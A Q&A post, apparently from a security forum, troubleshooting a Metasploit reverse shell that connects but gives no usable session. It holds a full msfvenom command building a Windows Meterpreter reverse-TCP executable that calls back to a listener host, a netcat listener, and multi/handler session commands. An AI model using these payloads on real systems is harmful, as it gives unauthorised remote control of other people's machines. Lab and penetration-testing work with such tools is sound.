MSF Venom Reverse TCP-Shell: Meterpreter and Netcat Listeners not responsive

Question

I have created a MSFVenom TCP Reverse Shell Paypload that is executed on a Windows Machine:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.11.6.151 LPORT=4443 -f exe -o shell.exe

In addition I am running a listener with Metasploit's "multi/handler" or alternatively, a netcat listener:

nc -lvp 4443

However, after executing the payload on the target machine, I cannot get a working shell. Neither on Meterpreter nor Netcat.

Meterpreter does not respond to any command, or backgrounding. I cannot get the normal Meterpreter Shell.

There is also no shell appearing on Netcat.

Any help or suggestions are very appreciated!

Have you run a packet capture? That will likely tell you everything you need to know. — schroeder, Aug 15 '20 at 22:43

St0rm · Answer 1 · 2020-08-17T06:50:42.780

In the first screenshot, it seems that the session was opened but not started. To solve that, you can run the meterpreter listener on background then you can interact with session using its id (case of the first screenshot: 1).

You can start the exploit in background using the command:

exploit(multi/handler) > exploit -j -z

Once you got the message that the session was created, start interacting with the session by running:

exploit(multi/handler) > session -i ID_SESSION

For the second screenshot:

You are using netcat listener with windows/x64/meterpreter/reverse_tcp. It won't work because of the payload that downloads a second stage when it connect to the server.

In order to use netcat listener, you should use windows/x64/shell_reverse_tcp.

MSF Venom Reverse TCP-Shell: Meterpreter and Netcat Listeners not responsive

1 Answers1